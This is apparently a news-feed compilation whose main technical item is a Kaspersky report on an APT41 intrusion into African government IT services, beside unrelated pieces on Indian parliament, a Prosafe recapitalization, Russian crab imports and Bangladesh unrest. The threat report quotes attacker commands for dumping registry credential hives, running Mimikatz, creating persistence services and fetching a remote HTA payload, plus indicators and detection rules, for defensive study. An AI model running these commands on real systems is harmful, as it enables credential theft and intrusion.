Meanwhile, BJP MP Baijayant Panda tabled the Report of the Select Committee on the Income Tax Bill, 2025 in the Lok Sabha. The report contains 285 recommendations aimed at overhauling the existing six-decade-old legislation.
The Monsoon session will run until August 21, with a break scheduled between August 12 and August 18. A total of 21 sittings are planned over the 32-day period.
(With inputs from ANI)
Source: GlobeNewswire (MIL-OSI)
Reference is made to the stock exchange announcement published by Prosafe SE (“Prosafe” or the “Company“) on 24 April 2025 where it was announced that Prosafe had agreed the terms of a recapitalization (the “Recapitalization“) which, inter alia, includes a recapitalization of USD 193 million into 321,635,718 new shares in the Company (the “New Shares“) and an offering of up to 17,868,651 warrants to shareholders in the Company as of 16 May 2025 as registered in the Euronex Securities Oslo VPS on the record date 20 May 2025 (the “Warrants“), subject to final approval being obtained by all lenders.
Reference is further made to the announcement published by the Company on 18 July 2025 regarding approval and publication of a prospectus in relation to issuance of the New Shares and offering of Warrants.
Registration of the New Shares issued following conversion of USD 193,000,000 of debt into equity has as part of the completion of the Recapitalization been registered with the Norwegian Register of Business Enterprises.
The Company’s registered share capital has consequently increased by EUR 3,216,357.18, from EUR 178,686.51 to EUR 3,395,043.69, by issuance of 321,635,718 new shares, each with a nominal value of EUR 0.01.
The Company’s new registered share capital is EUR 3,395,043.69 divided into 339,504,369 shares, each with a nominal value of EUR 0.01.
Prosafe is pleased to announce that the Recapitalization is now effective. The Recapitalization significantly improves Prosafe’s financial position, providing fresh liquidity and a reduction in debt of USD 193 million.
Prosafe maintains a positive outlook with new contracts recently secured and improved activity on the back of vessel re-activations. Prosafe recently announced the award of a new 4-year contract for the Safe Notos at a significantly improved day rate of approximately USD 140k/day. The Safe Caledonia started its contract with Ithaca in the UK North Sea on 2 June 2025 and Safe Boreas has arrived in Singapore ahead of the upcoming contract in Australia which has a start-up window between 15 November 2025 and 15 February 2026.
The Company would like to extend a warm welcome to the new Board of Directors elected at the Company’s annual general meeting held on 21 May 2025. The Company would also like to thank the departing board for all of their work, dedication and support over the past several years.
The Company expects unrestricted liquidity (excluding restricted cash and cash held in New Group) of approximately USD 90 to 100 million and headroom against the new USD 20 million covenant of approximately USD 70 to 80 million at the date of the Recapitalization.
Forward Looking Statement:
Prosafe takes the opportunity to provide guidance for the full year 2025 EBITDA which is anticipated to be in the range of USD 35 – 40 million. This assumes successful completion of the Safe Boreas re-activation prior to end Q3 2025, planned Special Periodic Surveys (SPS) and related off-hire periods for Safe Zephyrus and Safe Notos during Q3 and Q4 2025 as well as the successful completion of the Safe Caledonia contract. Reference is made to the Q1 presentation published on 21 May 2025 regarding current contracts, anticipated capital expenditure and costs.
For further information, please contact:
Terje Askvig, CEO
Phone: +47 952 03 886
Reese McNeel, CFO
Phone: +47 415 08 186
This information is subject to the disclosure requirements pursuant to section 5-12 of the Norwegian Securities Trading Act and the requirements of Oslo Børs’ Continuing Obligations.
Source: Government of India
Source: Government of India (4)
Prime Minister Narendra Modi on Monday inaugurated the Monsoon Session of Parliament, calling it a “true celebration of victory” and a moment of collective national pride. Addressing the media outside Parliament, the Prime Minister highlighted recent achievements across defence, science, economy, and digital governance, urging unity among lawmakers to strengthen the nation’s resolve.
Calling the monsoon a symbol of “renewal and rejuvenation,” PM Modi pointed to favourable weather conditions and record-high water reservoir levels—three times the ten-year average—as indicators of a strong agricultural and rural economic outlook.
“This Monsoon Session is a moment of great pride for the country,” he said, referring to the recent unfurling of the Indian tricolour aboard the International Space Station. He described the milestone as a unifying moment for both Houses of Parliament and an inspiration for India’s youth in the fields of science, technology, and innovation.
PM Modi praised the success of Operation Sindoor, India’s precision strike targeting terrorist camps. “Our armed forces achieved their mission with 100 percent success, neutralizing high-value targets within 22 minutes,” he said. He attributed this precision and efficiency to India’s growing defence self-reliance, highlighting global recognition of ‘Made in India’ military technology.
The Prime Minister called on Parliament to come together in a unified tribute to the operation, stating that such solidarity would boost defence sector innovation, manufacturing, and employment for India’s youth.
On the internal security front, PM Modi spoke about the decline of terrorism, Naxalism, and Maoism. He noted that many districts once dominated by insurgency have now transformed into “Green Growth Zones,” underscoring the growing influence of constitutional order over violence.
He also highlighted India’s rise from being among the “Fragile Five” economies in 2014 to being on the cusp of becoming the world’s third-largest economy. He noted that 250 million people have risen out of poverty during the past decade, and emphasized that inflation—currently around 2 percent—has stabilized the cost of living for citizens.
Turning to digital achievements, the Prime Minister lauded the widespread adoption of the Unified Payments Interface (UPI), which he described as a symbol of India’s leadership in the global fintech landscape. He said UPI has now become a recognized name worldwide.
Citing data from the International Labour Organization, PM Modi noted that more than 900 million Indians are now covered under social security. He also highlighted India’s successful eradication of trachoma, as declared by the World Health Organization, describing it as a key milestone in the nation’s public health journey.
Addressing the recent Pahalgam terror attack, PM Modi credited a united response by MPs across party lines for exposing Pakistan’s role in sponsoring terrorism at the global level. “This cross-party effort strengthened our diplomatic campaign and helped the world understand India’s position,” he said.
As the session got underway, the Prime Minister made a final appeal for unity among MPs. “While political opinions may vary, our intentions in matters of national interest must remain aligned,” he said. Modi urged all Members of Parliament to carry forward the spirit of “one voice” in championing India’s sovereignty, development, and aspirations.
Source: Securelist – Kaspersky
Headline: Rumble in the jungle: APT41’s new target in Africa
Some time ago, Kaspersky MDR analysts detected a targeted attack against government IT services in the African region. The attackers used hardcoded names of internal services, IP addresses, and proxy servers embedded within their malware. One of the C2s was a captive SharePoint server within the victim’s infrastructure.
During our incident analysis, we were able to determine that the threat actor behind the activity was APT41. This is a Chinese-speaking cyberespionage group known for targeting organizations across multiple sectors, including telecom and energy providers, educational institutions, healthcare organizations and IT energy companies in at least 42 countries. It’s worth noting that, prior to the incident, Africa had experienced the least activity from this APT.
Our MDR team identified suspicious activity on several workstations within an organization’s infrastructure. These were typical alerts indicating the use of the WmiExec module from the Impacket toolkit. Specifically, the alerts showed the following signs of the activity:
The attackers also leveraged the Atexec module from the Impacket toolkit.
The attackers used these commands to check the availability of their C2 server, both directly over the internet and through an internal proxy server within the organization.
The source of the suspicious activity turned out to be an unmonitored host that had been compromised. Impacket was executed on it in the context of a service account. We would later get that host connected to our telemetry to pinpoint the source of the infection.
After the Atexec and WmiExec modules finished running, the attackers temporarily suspended their operations.
After a brief lull, the attackers sprang back into action. This time, they were probing for running processes and occupied ports:
|
cmd.exe /c netstat –ano > C:Windowstemptemp_log.log cmd.exe /c tasklist /v > C:Windowstemptemp_log.log |
They were likely trying to figure out if the target hosts had any security solutions installed, such as EDR, MDR or XDR agents, host administration tools, and so on.
Additionally, the attackers used the built-in reg.exe utility to dump the SYSTEM and SAM registry hives.
|
cmd.exe /c reg save HKLMSAM C:Windowstemptemp_3.log cmd.exe /c reg save HKLMSYSTEM C:Windowstemptemp_4.log |
On workstations connected to our monitoring systems, our security solution blocked the activity, which resulted in an empty dump file. However, some hosts within the organization were not secured. As a result, the attackers successfully harvested credentials from critical registry hives and leveraged them in their subsequent attacks. This underscores a crucial point: to detect incidents promptly and minimize damage, security solution agents must be installed on all workstations across the organization without exception. Furthermore, the more comprehensive your telemetry data, the more effective your response will be. It’s also crucial to keep a close eye on the permissions assigned to service and user accounts, making sure no one ends up with more access rights than they really need. This is especially true for accounts that exist across multiple hosts in your infrastructure.
In the incident we’re describing here, two domain accounts obtained from a registry dump were leveraged for lateral movement: a domain account with local administrator rights on all workstations, and a backup solution account with domain administrator privileges. The local administrator privileges allowed the attackers to use the SMB protocol to transfer tools for communicating with the C2 to the administrative network share C$. We will discuss these tools – namely Cobalt Strike and a custom agent – in the next section.
In most cases, the attackers placed their malicious tools in the C:WINDOWSTASKS directory on target hosts, but they used other paths too:
|
1 2 3 4 5 6 7 |
c:windowstasks c:programdata c:programdatausoshared c:userspublicdownloads c:userspublic c:windowshelphelp c:userspublicvideos |
Files from these directories were then executed remotely using the WMI toolkit:
The attackers used Cobalt Strike for C2 communication on compromised hosts. They distributed the tool as an encrypted file, typically with a TXT or INI extension. To decrypt it, they employed a malicious library injected into a legitimate application via DLL sideloading.
Here’s a general overview of how Cobalt Strike was launched:
Attackers placed all the required files – the legitimate application, the malicious DLL, and the payload file – in one of the following directories:
|
C:UsersPublic C:Users{redacted}Downloads C:WindowsTasks |
The malicious library was a legitimate DLL modified to search for an encrypted Cobalt Strike payload in a specifically named file located in the same directory. Consequently, the names of the payload files varied depending on what was hardcoded into the malicious DLL.
During the attack, the threat actor used the following versions of modified DLLs and their corresponding payloads:
| Legitimate file name | DLL | Encrypted Cobalt Strike |
| TmPfw.exe | TmDbg64.dll | TmPfw.ini |
| cookie_exporter.exe | msedge.dll | Logs.txt |
| FixSfp64.exe | log.dll | Logs.txt |
| 360DeskAna64.exe | WTSAPI32.dll | config.ini |
| KcInst.exe | KcInst32.dll | kcinst.log |
| MpCmdRunq.exe | mpclient.dll | Logs.txt |
Despite using various legitimate applications to launch Cobalt Strike, the payload decryption process was similar across instances. Let’s take a closer look at one example of Cobalt Strike execution, using the legitimate file cookie_exporter.exe, which is part of Microsoft Edge. When launched, this application loads msedge.dll, assuming it’s in the same directory.
The attackers renamed cookie_exporter.exe to Edge.exe and replaced msedge.dll with their own malicious library of the same name.
When any dynamic library is loaded, the DllEntryPoint function is executed first. In the modified DLL, this function included a check for a debugging environment. Additionally, upon its initial execution, the library verified the language packs installed on the host.. The malicious code would not run if it detected any of the following language packs:
If the system passes the checks, the application that loaded the malicious library executes an exported DLL function containing the malicious code. Because different applications were used to launch the library in different cases, the exported functions vary depending on what the specific software calls. For example, with msedge.dll, the malicious code was implemented in the ShowMessageWithString function, called by cookie_exporter.exe.
The ShowMessageWithString function retrieves its payload from Logs.txt, a file located in the same directory. These filenames are typically hardcoded in the malicious dynamic link libraries we’ve observed.
The screenshot below shows a disassembled code segment responsible for loading the encrypted file. It clearly reveals the path where the application expects to find the file.
The payload is decrypted by repeatedly executing the following instructions using 128-bit SSE registers:
Once the payload is decrypted, the malicious executable code from msedge.dll launches it by using a standard method: it allocates a virtual memory region within its own process, then copies the code there and executes it by creating a new thread. In other versions of similarly distributed Cobalt Strike agents that we examined, the malicious code could also be launched by creating a new process or upon being injected into the memory of another running process.
Beyond the functionality described above, we also found a code segment within the malicious libraries that appeared to be a message to the analyst. These strings are supposed to be displayed if the DLL finds itself running in a debugger, but in practice this doesn’t occur.
Once Cobalt Strike successfully launches, the implant connects to its C2 server. Threat actors then establish persistence on the compromised host by creating a service with a command similar to this:
|
1 |
C:Windowssystem32cmd.exe /C sc create “server power” binpath= “cmd /c start C:WindowstasksEdge.exe” && sc description “server power” “description” && sc config “server power” start= auto && net start “server power” |
Attackers often use the following service names for embedding Cobalt Strike:
|
server power WindowsUpdats 7–zip Update |
During our investigation, we uncovered a compromised SharePoint server that the attackers were using as the C2. They distributed files named agents.exe and agentx.exe via the SMB protocol to communicate with the server. Each of these files is actually a C# Trojan whose primary function is to execute commands it receives from a web shell named CommandHandler.aspx, which is installed on the SharePoint server. The attackers uploaded multiple versions of these agents to victim hosts. All versions had similar functionality and used a hardcoded URL to retrieve commands:
The agents executed commands from CommandHandler.aspx using the cmd.exe command shell launched with the /c flag.
While analyzing the agents, we didn’t find significant diversity in their core functionality, despite the attackers constantly modifying the files. Most changes were minor, primarily aimed at evading detection. Outdated file versions were removed from the compromised hosts.
The attackers used the deployed agents to conduct reconnaissance and collect sensitive data, such as browser history, text files, configuration files, and documents with .doc, .docx and .xlsx extensions. They exfiltrated the data back to the SharePoint server via the upload.ashx web shell.
It is worth noting that the attackers made some interesting mistakes while implementing the mechanism for communicating with the SharePoint server. Specifically, if the CommandHandler.aspx web shell on the server was unavailable, the agent would attempt to execute the web page’s error message as a command:
If, after their initial reconnaissance, the attackers deemed an infected host valuable for further operations, they’d try to establish an alternative command-shell access. To do this, they executed the following command to download from an external resource a malicious HTA file containing an embedded JavaScript script and run this file:
|
1 |
“cmd.exe” /c mshta hxxp[:]//github.githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta |
The group attempted to mask their malicious activity by using resources that mimicked legitimate ones to download the HTA file. Specifically, the command above reached out to the GitHub-impersonating domain github[.]githubassets[.]net. The attackers primarily used the site to host JavaScript code. These scripts were responsible for delivering either the next stage of their malware or the tools needed to further the attack.
At the time of our investigation, a harmless script was being downloaded from github[.]githubassets[.]net instead of a malicious one. This was likely done to hide the activity and complicate attack analysis.
However, we were able to obtain and analyze previously distributed scripts, specifically the malicious file 2CD15977B72D5D74FADEDFDE2CE8934F. Its primary purpose is to create a reverse shell on the host, giving the attackers a shell for executing their commands.
Once launched, the script gathers initial host information:
It then connects to the C2 server, also located at github[.]githubassets[.]net, and transmits a unique ATTACK_ID along with the initially collected data. The script leverages various connection methods, such as WebSockets, AJAX, and Flash. The choice depends on the capabilities available in the browser or execution environment.
Next, the attackers utilized automation tools such as stealers and credential-harvesting utilities to collect sensitive data. We detail these tools below. Data gathered by these utilities was also exfiltrated via the compromised SharePoint server. In addition to the aforementioned web shell, the SMB protocol was used to upload data to the server. The files were transferred to a network share on the SharePoint server.
A modified version of the Pillager utility stands out among the tools the attackers deployed on hosts to gather sensitive information. This tool is used to export and decrypt data from the target computer. The original Pillager version is publicly available in a repository, accompanied by a description in Chinese.
The primary types of data collected by this utility include:
A sample of data collected by Pillager:
The utility is typically an executable (EXE) file. However, the attackers rewrote the stealer’s code and compiled it into a DLL named wmicodegen.dll. This code then runs on the host via DLL sideloading. They chose convert-moftoprovider.exe, an executable from the Microsoft SDK toolkit, as their victim application. It is normally used for generating code from Managed Object Format (MOF) files.
Despite modifying the code, the group didn’t change the stealer’s default output file name and path: C:WindowsTempPillager.zip.
It’s worth noting that the malicious library they used was based on the legitimate SimpleHD.dll HDR rendering library from the Xbox Development Kit. The source code for this library is available on GitHub. This code was modified so that convert-moftoprovider.exe loaded an exported function, which implemented the Pillager code.
Interestingly, the path to the PDB file, while appearing legitimate, differs by using PS5 instead of XBOX:
The second stealer the attackers employed was Checkout. In addition to saved credentials and browser history, it also steals information about downloaded files and credit card data saved in the browser.
When launching the stealer, the attackers pass it a j8 parameter; without it, the stealer won’t run. The malware collects data into CSV files, which it then archives and saves as CheckOutData.zip in a specially created directory named CheckOut.
Beyond standard methods for gathering registry dumps, such as using reg.exe, the attackers leveraged the publicly available utility RawCopy (MD5 hash: 0x15D52149536526CE75302897EAF74694) to copy raw registry files.
RawCopy is a command-line application that copies files from NTFS volumes using a low-level disk reading method.
The following commands were used to collect registry files:
|
c:userspublicdownloadsRawCopy.exe /FileNamePath:C:WindowsSystem32Configsystem /OutputPath:c:userspublicdownloads c:userspublicdownloadsRawCopy.exe /FileNamePath:C:WindowsSystem32Configsam /OutputPath:c:userspublicdownloads c:userspublicdownloadsRawCopy.exe /FileNamePath:C:WindowsSystem32Configsecurity /OutputPath:c:userspublicdownloads |
The attackers also used Mimikatz to dump account credentials. Like the Pillager stealer, Mimikatz was rewritten and compiled into a DLL. This DLL was then loaded by the legitimate java.exe file (used for compiling Java code) via DLL sideloading. The following files were involved in launching Mimikatz:
|
C:WindowsTemp123.bat C:WindowsTempjli.dll C:WindowsTempjava.exe С:WindowsTempconfig.ini |
123.bat is a BAT script containing commands to launch the legitimate java.exe executable, which in turn loads the dynamic link library for DLL sideloading. This DLL then decrypts and executes the Mimikatz configuration file, config.ini, which is distributed from a previously compromised host within the infrastructure.
|
1 |
java.exe privilege::debug token::elevate lsadump::secrets exit |
As already mentioned, the victim organization’s monitoring coverage was initially patchy. Because of this, in the early stages, we only saw the external IP address of the initial source and couldn’t detect what was happening on that host. After some time, the host was finally connected to our monitoring systems, and we found that it was an IIS web server. Furthermore, despite the lost time, it still contained artifacts of the attack.
These included the aforementioned Cobalt Strike implant located in c:programdata, along with a scheduler task for establishing persistence on the system. Additionally, a web shell remained on the host, which our solutions detected as HEUR:Backdoor.MSIL.WebShell.gen. This was found in the standard temporary directory for compiled ASP.NET application files:
|
c:windowsmicrosoft.netframework64v4.0.30319temporary asp.net filesrootdedc22b849ac6571app_web_hdmuushc.dll MD5: 0x70ECD788D47076C710BF19EA90AB000D |
These temporary files are automatically generated and contain the ASPX page code:
The web shell was named newfile.aspx. The screenshot above shows its function names. Based on these names, we were able to determine that this instance utilized a Neo-reGeorg web shell tunnel.
This tool is used to proxy traffic from an external network to an internal one via an externally accessible web server. Thus, the launch of the Impacket tools, which we initially believed was originating from a host unidentified at the time (the IIS server), was in fact coming from the external network through this tunnel.
Attribution
We attribute this attack to APT41 with a high degree of confidence, based on the similarities in the TTPs, tooling, and C2 infrastructure with other APT41 campaigns. In particular:
The attackers wield a wide array of both custom-built and publicly available tools. Specifically, they use penetration testing tools like Cobalt Strike at various stages of an attack. The attackers are quick to adapt to their target’s infrastructure, updating their malicious tools to account for specific characteristics. They can even leverage internal services for C2 communication and data exfiltration. The files discovered during the investigation indicate that the malicious actor modifies its techniques during an attack to conceal its activities – for example, by rewriting executables and compiling them as DLLs for DLL sideloading.
While this story ended relatively well – we ultimately managed to evict the attackers from the target organization’s systems – it’s impossible to counter such sophisticated attacks without a comprehensive knowledge base and continuous monitoring of the entire infrastructure. For example, in the incident at hand, some assets weren’t connected to monitoring systems, which prevented us from seeing the full picture immediately. It’s also crucial to maintain maximum coverage of your infrastructure with security tools that can automatically block malicious activity in the initial stages. Finally, we strongly advise against granting excessive privileges to accounts, and especially against using such accounts on all hosts across the infrastructure.
strings:
$func1 = “FrameworkInitialize” fullword
$func2 = “GetTypeHashCode” fullword
$func3 = “ProcessRequest” fullword
$func4 = “__BuildControlTree”
$func5 = “__Render__control1”
$str1 = “FAIL” nocase wide
$str2 = “Port close” nocase wide
$str3 = “Port filtered” nocase wide
$str4 = “DISCONNECT” nocase wide
$str5 = “FORWARD” nocase wide
condition:
uint16(0) == 0x5A4D and
filesize
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
rule neoregeorg_aspx_web_shell { meta: description = “Rule to detect neo-regeorg based ASPX web-shells” author = “Kaspersky” copyright = “Kaspersky” distribution = “DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM” strings: $func1 = “FrameworkInitialize” fullword $func2 = “GetTypeHashCode” fullword $func3 = “ProcessRequest” fullword $func4 = “__BuildControlTree” $func5 = “__Render__control1” $str1 = “FAIL” nocase wide $str2 = “Port close” nocase wide $str3 = “Port filtered” nocase wide $str4 = “DISCONNECT” nocase wide $str5 = “FORWARD” nocase wide
condition: uint16(0) == 0x5A4D and filesize 400000 and 3 of ($func*) and 3 of ($str*) } |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
title: Service Image Path Start From CMD id: faf1e809–0067–4c6f–9bef–2471bd6d6278 status: test description: Detects creation of unusual service executable starting from cmd /c using command line references: – tbd tags: – attack.persistence – attack.T1543.003 author: Kaspersky date: 2025/05/15 logsource: product: windows service: security detection: selection: EventID: 4697 ServiceFileName|contains: – ‘%COMSPEC%’ – ‘cmd’ – ‘cmd.exe’ ServiceFileName|contains|all: – ‘/c’ – ‘start’ condition: selection falsepositives: – Legitimate level: medium |
2F9D2D8C4F2C50CC4D2E156B9985E7CA
9B4F0F94133650B19474AF6B5709E773
A052536E671C513221F788DE2E62316C
91D10C25497CADB7249D47AE8EC94766
C3ED337E2891736DB6334A5F1D37DC0F
9B00B6F93B70F09D8B35FA9A22B3CBA1
15097A32B515D10AD6D793D2D820F2A8
A236DCE873845BA4D3CCD8D5A4E1AEFD
740D6EB97329944D82317849F9BBD633
C7188C39B5C53ECBD3AEC77A856DDF0C
3AF014DB9BE1A04E8B312B55D4479F69
4708A2AE3A5F008C87E68ED04A081F18
125B257520D16D759B112399C3CD1466
C149252A0A3B1F5724FD76F704A1E0AF
3021C9BCA4EF3AA672461ECADC4718E6
F1025FCAD036AAD8BF124DF8C9650BBC
100B463EFF8295BA617D3AD6DF5325C6
2CD15977B72D5D74FADEDFDE2CE8934F
9D53A0336ACFB9E4DF11162CCF7383A0
27F506B198E7F5530C649B6E4860C958
47.238.184[.]9
38.175.195[.]13
hxxp://github[.]githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta
hxxp://chyedweeyaxkavyccenwjvqrsgvyj0o1y.oast[.]fun/aaa
hxxp://toun[.]callback.red/aaa
hxxp://asd.xkx3[.]callback.[]red
hxxp[:]//ap-northeast-1.s3-azure[.]com
hxxps[:]//www[.]msn-microsoft[.]org:2053
hxxp[:]//www.upload-microsoft[.]com
s3-azure.com
*.ns1.s3-azure.com
*.ns2.s3-azure.com
upload-microsoft[.]com
msn-microsoft[.]org
| Tactic | Technique | ID |
| Initial Access | Valid Accounts: Domain Accounts | T1078.002 |
| Exploit Public-Facing Application | T1190 | |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 |
| Command and Scripting Interpreter: Windows Command Shell | T1059.003 | |
| Scheduled Task/Job: Scheduled Task | T1053.005 | |
| Windows Management Instrumentation | T1047 | |
| Persistence | Create or Modify System Process: Windows Service | T1543.003 |
| Hijack Execution Flow: DLL Side-Loading | T1574.002 | |
| Scheduled Task/Job: Scheduled Task | T1053.005 | |
| Valid Accounts: Domain Accounts | T1078.002 | |
| Web Shell | T1505.003 | |
| IIS Components | T1505.004 | |
| Privilege Escalation | Create or Modify System Process: Windows Service | T1543.003 |
| Hijack Execution Flow: DLL Side-Loading | T1574.002 | |
| Process Injection | T1055 | |
| Scheduled Task/Job: Scheduled Task | T1053.005 | |
| Valid Accounts: Domain Accounts | T1078.002 | |
| Defense Evasion | Hijack Execution Flow: DLL Side-Loading | T1574.002 |
| Deobfuscate/Decode Files or Information | T1140 | |
| Indicator Removal: File Deletion | T1070.004 | |
| Masquerading | T1036 | |
| Process Injection | T1055 | |
| Credential Access | Credentials from Password Stores: Credentials from Web Browsers | T1555.003 |
| OS Credential Dumping: Security Account Manager | T1003.002 | |
| Unsecured Credentials | T1552 | |
| Discovery | Network Service Discovery | T1046 |
| Process Discovery | T1057 | |
| System Information Discovery | T1082 | |
| System Network Configuration Discovery | T1016 | |
| Lateral movement | Lateral Tool Transfer | T1570 |
| Remote Services: SMB/Windows Admin Shares | T1021.002 | |
| Collection | Archive Collected Data: Archive via Utility | T1560.001 |
| Automated Collection | T1119 | |
| Data from Local System | T1005 | |
| Command and Control | Application Layer Protocol: Web Protocols | T1071.001 |
| Application Layer Protocol: DNS | T1071.004 | |
| Ingress Tool Transfer | T1105 | |
| Proxy: Internal Proxy | T1090.001 | |
| Protocol Tunneling | T1572 | |
| Exfiltration | Exfiltration Over Alternative Protocol | T1048 |
| Exfiltration Over Web Service | T1567 |
Translation. Region: Russian Federal
Source: People’s Republic of China in Russian – People’s Republic of China in Russian –
An important disclaimer is at the bottom of this article.
Source: People’s Republic of China – State Council News
BEIJING, July 21 (Xinhua) — Trucks loaded with king crabs and other seafood line up at the Hunchun port in northeast China’s Jilin Province in the height of summer to clear customs before entering China.
Truck driver Chen Chen said he can transport up to four tons of king crabs at a time.
According to the Zhongxinshe news agency, more than 1.5 million units of Kamchatka crabs from Russia are imported into China through the Hunchun checkpoint every year, which accounts for about 80 percent of the country’s total market. Hunchun has truly become a key gateway for China to import this seafood delicacy.
With the continuous improvement of cross-border logistics and transportation efficiency in recent years, Russian-produced Kamchatka crabs have become part of the daily life of Chinese people.
Over the past decade, Kamchatka crabs have been sold not only in northeast China, but also served on tables in major cities such as Beijing, Shanghai, Guangzhou and Shenzhen.
To meet the high market demand, Hunchun City also focused on promoting the Northeast Asia Fresh Seafood Park project with a total investment of over 600 million yuan (about 83.6 million US dollars).
The park will not only be used for temporary storage of imported seafood, but also to stimulate the development of processing trade to build an important hub for processing and distributing fresh seafood in northern China, said Liu Yansong, head of the park.
Now tasting king crabs has become a tourist specialty of Hunchun.
Previously, imported Russian king crabs had to be transported to China via Busan, a city in the southeast of the Republic of Korea. After Hunchun was approved as a specialized checkpoint for importing chilled seafood and edible aquatic animals, this “golden corridor” for importing king crabs into the country was opened. In addition, the Kamchatka-Zarubino-Hunchun route made the transportation of aquatic products between China and Russia more stable and uninterrupted.
To ensure the freshness of imported seafood, Hunchun Customs has opened a “green channel” to provide inspection and release services by appointment all year round and around the clock, speeding up customs clearance.
In recent years, Chinese consumers’ interest in Russian Kamchatka crabs has grown rapidly. According to the General Administration of Customs of China, the total value of China’s imports of live, fresh and frozen crabs from Russia exceeded US$1.14 billion last year, up 16.7 percent from the previous year. -0-
Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.
.
Source: Agenzia Fides – MIL OSI
Dhaka (Agenzia Fides) – Clashes between supporters of political parties have once again created social instability in Bangladesh. Tensions have flared in recent days in the city of Gopalganj, south of Dhaka, where members of the Awami League, the party of former Prime Minister Sheikh Hasina, who has fled abroad, attacked the march of activists from the National Citizen Party, the student party that officially presented itself to voters in early 2025.Following the clashes in Gopalganj, the government imposed a curfew to regain control of the situation, while four people died and 13 were injured in clashes with police.Social tensions are flaring up again as the country nears the finish line of the next general elections, which the interim government Muhammad Yunus, after considerable domestic and international pressure, has announced will be held in April 2026.Sheikh Hasina is currently in India and has been tried for the repression of protesters during the student protests that, in August 2024, brought an end to her 15-year rule. Hasina has been accused of ordering police to fire on protesters (there were numerous casualties), while the exiled leader maintains that the accusations against her are politically motivated.Meanwhile, the Awami League has been banned in Bangladesh, pending the outcome of the trial. The party was barred from participating in the elections after the Election Commission suspended its registration. The measure has exacerbated social polarization and tensions.Meanwhile, the consequences of the collapse of the industrial sector are being felt in the country, with a significant drop in foreign investment, steadily rising inflation, and ever-rising costs for basic goods. “A sense of frustration is growing among people, which could have repercussions in the voting process,” notes a local Fides source in the Catholic community.In a country with 170 million inhabitants, the vast majority of whom are Muslim, Christians and other religious minorities have expressed concern about the return of radical Islamic parties to the political scene. Indeed, Bangladesh’s Supreme Court has overturned the ban on the country’s main Muslim party, which for more than ten years had been relegated to the margins of society by the government of former Prime Minister Sheikh Hasina. Jamaat-e-Islami will now be able to participate in the next general elections and is preparing to broaden its base of political consensus. The danger, highlighted especially by civil society organizations and associations, is the influence that Islamist parties could have on the country’s future government. Therefore, the interim government has been asked to complete the process of constitutional reforms before the elections, defining an institutional and legal framework based on the principles of democracy, pluralism, and equality. (PA) (Agenzia Fides, 19/7/2025)
Share:
